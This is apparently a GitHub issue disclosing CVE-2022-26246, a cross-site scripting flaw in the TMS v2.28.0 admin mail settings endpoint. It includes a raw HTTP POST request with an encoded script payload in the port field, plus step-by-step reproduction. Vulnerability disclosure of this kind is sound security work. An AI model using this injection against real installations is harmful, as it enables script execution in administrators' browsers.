Headline
CVE-2022-26246: There is a cross site scripting vulnerability exists in tms · Issue #15 · xiweicheng/tms
TMS v2.28.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /TMS/admin/setting/mail/createorupdate.
[Suggested description]
Cross SIte Scripting (XSS) vulnerability exists in tms. The cause of the vulnerability is that the input data is not filtered in the foreground page /TMS/admin/setting/mail/ createorupdate, and the input parameters are directly passed into the setting method of AdminController and executed.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://github.com/xiweicheng/tms
[Affected Product Code Base]
v2.28.0
[Affected Component]
POST /tms/admin/setting/mail/createOrUpdate HTTP/1.1
Host: localhost:8080
Content-Length: 113
sec-ch-ua: " Not A;Brand";v="99", “Chromium";v="92”
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/tms/admin/setting
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=CDC518A82EFF7D857356EBF9AB4206D2; locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1645601594
Connection: close
host=smtp.163.com&port=25%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E&username=someone%40163.com&password=&addr=&=
[Attack Type]
Remote
[Impact Code execution]
true
[Vulnerability proof]
1.Access URL: http://localhost:8080/tms/admin/setting , enter the system setting interface
2.Enter JS code in the form: <script> alert (“XSS”) </script >
3.Click Save to trigger a pop-up window, and the loophole reappearance is completed.
4.The cause of the vulnerability is that the input data is not filtered in the foreground page /TMS/admin/setting/mail/ createorupdate, and the input parameters are directly passed into the setting method of AdminController and executed.